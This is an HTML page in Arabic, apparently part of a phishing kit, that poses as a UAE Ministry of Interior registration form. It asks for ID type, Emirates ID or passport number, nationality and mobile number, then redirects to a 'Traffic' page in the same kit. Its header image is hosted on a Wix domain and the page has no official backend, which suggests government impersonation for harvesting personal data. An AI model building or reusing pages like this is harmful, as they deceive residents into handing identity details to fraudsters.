<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>تسجيل مستخدم جديد - وزارة الداخلية</title>
    <style>
        body { font-family: 'Segoe UI', Tahoma, sans-serif; background-color: #f9f9f9; margin: 0; padding: 0; overflow-x: hidden; }
        .header { width: 100%; background: #fff; text-align: center; border-bottom: 1px solid #eee; line-height: 0; }
        .header img { width: 100%; height: auto; display: block; }
        .container { max-width: 550px; margin: 20px auto; background: #fff; padding: 35px; border-radius: 10px; box-shadow: 0 4px 15px rgba(0,0,0,0.05); border-top: 4px solid #c5a367; }
        h2 { text-align: center; color: #333; font-size: 22px; margin-bottom: 35px; font-weight: bold; }
        .form-group { margin-bottom: 25px; text-align: right; }
        label { display: block; margin-bottom: 10px; color: #555; font-size: 14px; font-weight: bold; }
        select, input { width: 100%; padding: 14px; border: 1px solid #d1d1d1; border-radius: 5px; font-size: 16px; box-sizing: border-box; text-align: right; background-color: #fff; color: #333; outline: none; }
        select:focus, input:focus { border-color: #c5a367; }
        .btn-submit { width: 100%; padding: 18px; background-color: #c5a367; color: #fff; border: none; border-radius: 5px; font-size: 19px; font-weight: bold; cursor: pointer; margin-top: 10px; }
    </style>
</head>
<body>
<div class="header">
    <img src="https://static.wixstatic.com/media/a9f3d9_06f1bacd5c6543efa20f319b06df8438~mv2.jpg" alt="MOI Header">
</div>
<div class="container">
    <h2>إنشاء حساب جديد</h2>
    <div class="form-group">
        <label>نوع الهوية</label>
        <select id="idType">
            <option value="emirates_id">هوية إماراتية (للمواطنين والمقيمين)</option>
            <option value="passport">جواز سفر (للزوّار)</option>
            <option value="gcc_id">هوية مواطني دول مجلس التعاون</option>
        </select>
    </div>
    <div class="form-group">
        <label>رقم الهوية / الجواز</label>
        <input type="text" id="idNumber" placeholder="XXXX-XXXXXXX-X-784">
    </div>
    <div class="form-group">
        <label>الجنسية</label>
        <select id="nationality">
            <option value="" disabled selected>اختر الجنسية</option>
            <option value="UAE">الإمارات العربية المتحدة</option><option value="AF">أفغانستان</option><option value="AL">ألبانيا</option><option value="DZ">الجزائر</option><option value="AD">أندورا</option><option value="AO">أنغولا</option><option value="AG">أنتيغوا وبربودا</option><option value="AR">الأرجنتين</option><option value="AM">أرمينيا</option><option value="AU">أستراليا</option><option value="AT">النمسا</option><option value="AZ">أذربيجان</option><option value="BS">جزر البهاما</option><option value="BH">البحرين</option><option value="BD">بنجلاديش</option><option value="BB">باربادوس</option><option value="BY">بيلاروسيا</option><option value="BE">بلجيكا</option><option value="BZ">بليز</option><option value="BJ">بنين</option><option value="BT">بوتان</option><option value="BO">بوليفيا</option><option value="BA">البوسنة والهرسك</option><option value="BW">بوتسوانا</option><option value="BR">البرازيل</option><option value="BN">بروناي</option><option value="BG">بلغاريا</option><option value="BF">بوركينا فاسو</option><option value="BI">بوروندي</option><option value="KH">كمبوديا</option><option value="CM">الكاميرون</option><option value="CA">كندا</option><option value="CV">الرأس الأخضر</option><option value="CF">جمهورية أفريقيا الوسطى</option><option value="TD">تشاد</option><option value="CL">تشيلي</option><option value="CN">الصين</option><option value="CO">كولومبيا</option><option value="KM">جزر القمر</option><option value="CG">الكونغو</option><option value="CR">كوستاريكا</option><option value="HR">كرواتيا</option><option value="CU">كوبا</option><option value="CY">قبرص</option><option value="CZ">جمهورية التشيك</option><option value="DK">الدنمارك</option><option value="DJ">جيبوتي</option><option value="DM">دومينيكا</option><option value="DO">جمهورية الدومينيكان</option><option value="EC">الإكوادور</option><option value="EG">مصر</option><option value="SV">السلفادور</option><option value="GQ">غينيا الاستوائية</option><option value="ER">إريتريا</option><option value="EE">إستونيا</option><option value="ET">إثيوبيا</option><option value="FJ">فيجي</option><option value="FI">فنلندا</option><option value="FR">فرنسا</option><option value="GA">الغابون</option><option value="GM">غامبيا</option><option value="GE">جورجيا</option><option value="DE">ألمانيا</option><option value="GH">غانا</option><option value="GR">اليونان</option><option value="GD">غرينادا</option><option value="GT">غواتيمالا</option><option value="GN">غينيا</option><option value="GW">غينيا بيساو</option><option value="GY">غويانا</option><option value="HT">هايتي</option><option value="HN">هندوراس</option><option value="HU">المجر</option><option value="IS">آيسلندا</option><option value="IN">الهند</option><option value="ID">إندونيسيا</option><option value="IR">إيران</option><option value="IQ">العراق</option><option value="IE">أيرلندا</option><option value="IT">إيطاليا</option><option value="JM">جامايكا</option><option value="JP">اليابان</option><option value="JO">الأردن</option><option value="KZ">كازاخستان</option><option value="KE">كينيا</option><option value="KI">كيريباتي</option><option value="KP">كوريا الشمالية</option><option value="KR">كوريا الجنوبية</option><option value="KW">الكويت</option><option value="KG">قيرغيزستان</option><option value="LA">لاوس</option><option value="LV">لاتفيا</option><option value="LB">لبنان</option><option value="LS">ليسوتو</option><option value="LR">ليبيريا</option><option value="LY">ليبيا</option><option value="LI">ليختنشتاين</option><option value="LT">ليتوانيا</option><option value="LU">لوكسمبورج</option><option value="MK">مقدونيا</option><option value="MG">مدغشقر</option><option value="MW">مالاوي</option><option value="MY">ماليزيا</option><option value="MV">جزر المالديف</option><option value="ML">مالي</option><option value="MT">مالطا</option><option value="MH">جزر مارشال</option><option value="MR">موريتانيا</option><option value="MU">موريشيوس</option><option value="MX">المكسيك</option><option value="FM">ميكرونيزيا</option><option value="MD">مولدوفا</option><option value="MC">موناكو</option><option value="MN">منغوليا</option><option value="ME">الجبل الأسود</option><option value="MA">المغرب</option><option value="MZ">موزمبيق</option><option value="MM">ميانمار</option><option value="NA">ناميبيا</option><option value="NR">ناورو</option><option value="NP">نيبال</option><option value="NL">هولندا</option><option value="NZ">نيوزيلندا</option><option value="NI">نيكاراجوا</option><option value="NE">النيجر</option><option value="NG">نيجيريا</option><option value="NO">النرويج</option><option value="OM">عمان</option><option value="PK">باكستان</option><option value="PW">بالاو</option><option value="PA">بنما</option><option value="PG">بابوا غينيا الجديدة</option><option value="PY">باراغواي</option><option value="PE">بيرو</option><option value="PH">الفلبين</option><option value="PL">بولندا</option><option value="PT">البرتغال</option><option value="QA">قطر</option><option value="RO">رومانيا</option><option value="RU">روسيا</option><option value="RW">رواندا</option><option value="KN">سانت كيتس ونيفيس</option><option value="LC">سانت لوسيا</option><option value="VC">سانت فينسنت والغرينادين</option><option value="WS">ساموا</option><option value="SM">سان مارينو</option><option value="ST">ساو تومي وبرينسيب</option><option value="SA">المملكة العربية السعودية</option><option value="SN">السنغال</option><option value="RS">صربيا</option><option value="SC">سيشل</option><option value="SL">سيراليون</option><option value="SG">سنغافورة</option><option value="SK">سلوفاكيا</option><option value="SI">سلوفينيا</option><option value="SB">جزر سليمان</option><option value="SO">الصومال</option><option value="ZA">جنوب أفريقيا</option><option value="SS">جنوب السودان</option><option value="ES">إسبانيا</option><option value="LK">سريلانكا</option><option value="SD">السودان</option><option value="SR">سورينام</option><option value="SZ">سوازيلاند</option><option value="SE">السويد</option><option value="CH">سويسرا</option><option value="SY">سوريا</option><option value="TW">تايوان</option><option value="TJ">طاجيكستان</option><option value="TZ">تنزانيا</option><option value="TH">تايلاند</option><option value="TL">تيمور الشرقية</option><option value="TG">توغو</option><option value="TO">تونغا</option><option value="TT">ترينيداد وتوباغو</option><option value="TN">تونس</option><option value="TR">تركيا</option><option value="TM">تركمانستان</option><option value="TV">توفالو</option><option value="UG">أوغندا</option><option value="UA">أوكرانيا</option><option value="GB">المملكة المتحدة</option><option value="US">الولايات المتحدة الأمريكية</option><option value="UY">أوروغواي</option><option value="UZ">أوزبكستان</option><option value="VU">فانواتو</option><option value="VE">فنزويلا</option><option value="VN">فيتنام</option><option value="YE">اليمن</option><option value="ZM">زامبيا</option><option value="ZW">زيمبابوي</option>
        </select>
    </div>
    <div class="form-group">
        <label>رقم الهاتف المتحرك</label>
        <input type="text" id="phone" placeholder="05XXXXXXXX">
    </div>
    <button class="btn-submit" onclick="goToTraffic()">متابعة التسجيل</button>
</div>
<script>
    function goToTraffic() { window.location.href = "../Traffic/index.html"; }
</script>
</body>
</html>
